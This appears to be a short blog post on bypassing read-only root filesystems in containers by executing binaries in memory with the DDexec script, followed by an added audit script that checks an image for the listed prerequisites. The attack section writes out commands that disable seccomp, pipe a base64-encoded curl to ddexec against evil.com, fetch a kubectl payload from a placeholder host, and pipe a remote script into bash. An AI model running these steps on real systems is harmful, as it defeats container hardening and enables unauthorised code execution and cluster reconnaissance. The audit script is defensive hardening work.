Bypassing the read-only filesystem (ro) restriction in containers: in-memory execution

  1. These programs should be available in the container image:
       dd
       bash | zsh | ash (busybox)
       setarch | linux64 (busybox)
       head
       tail
       cut
       grep
       od
       readlink
       wc
       tr
       base64
       sleep
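
    # Start a container with a read-only root filesystem and seccomp unconfined
    docker run --security-opt seccomp=unconfined --read-only -it ubuntu

    # Download a static curl build, rename it and base64-encode it
    wget https://github.com/moparisthebest/static-curl/releases/download/v7.82.0/curl-amd64 && mv curl-amd64 curl
    base64 -w0 ./curl > curl.b64

    # Define ddexec as a shell function
    ddexec()
    {
    # Copy and paste the ddexec.sh script as it is.
    }

    # Feed the base64-encoded binary to ddexec on stdin
    echo -n "<b64 encoded curl binary>" | ddexec /bin/curl evil.com
    curl -sk "http://<IP>:<PORT>/<kubectl.b64>" | ddexec /bin/kubectl auth can-i --list

    # Same, with ddexec.sh fetched from the repository instead of pasted
    # (the process substitution needs a command to fetch the URL)
    curl -sk "http://<IP>:<PORT>/<kubectl.b64>" | bash <(curl -sk https://raw.githubusercontent.com/arget13/DDexec/main/ddexec.sh) /bin/kubectl auth can-i --list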
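
The prerequisite list in step 1 also works as an image-hardening checklist. The script below is an added example, not part of the original post or of the DDexec project: it audits a search path for those programs, and the function names `first_present` and `missing_prereqs` are hypothetical.

```shell
#!/bin/sh
# Added example: report which prerequisites from the list in step 1 are absent
# from an image's search path. Plain names must all be present; an "a|b" group
# is satisfied by any one member.
PREREQS="dd bash|zsh|ash setarch|linux64 head tail cut grep od readlink wc tr base64 sleep"

# first_present DIRS "a|b|c": print the first alternative found as an
# executable file in the colon-separated DIRS; return 1 if none is found.
first_present() {
    dirs=$1; alts=$2
    old_ifs=$IFS; IFS='|'
    for name in $alts; do
        IFS=:
        for d in $dirs; do
            if [ -x "$d/$name" ] && [ ! -d "$d/$name" ]; then
                IFS=$old_ifs; echo "$name"; return 0
            fi
        done
        IFS='|'
    done
    IFS=$old_ifs
    return 1
}

# missing_prereqs DIRS: print one line per prerequisite (or group) that is
# absent from DIRS. Empty output means every prerequisite is available.
missing_prereqs() {
    for req in $PREREQS; do
        first_present "$1" "$req" >/dev/null || echo "$req"
    done
}

# Audit the current PATH, for example from a shell inside the image under review.
missing=$(missing_prereqs "$PATH")
if [ -z "$missing" ]; then
    echo "all listed prerequisites are present on PATH"
else
    echo "absent from PATH:"
    echo "$missing"
fi
```

Empty output from `missing_prereqs` means the image ships everything on the list; a minimal image that drops the shell or the listed utilities shows up as one line per missing entry.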

Geek👾. Tries to understand how computers work. Would love to hear your suggestions and feedback. https://www.linkedin.com/in/pswalia2u/
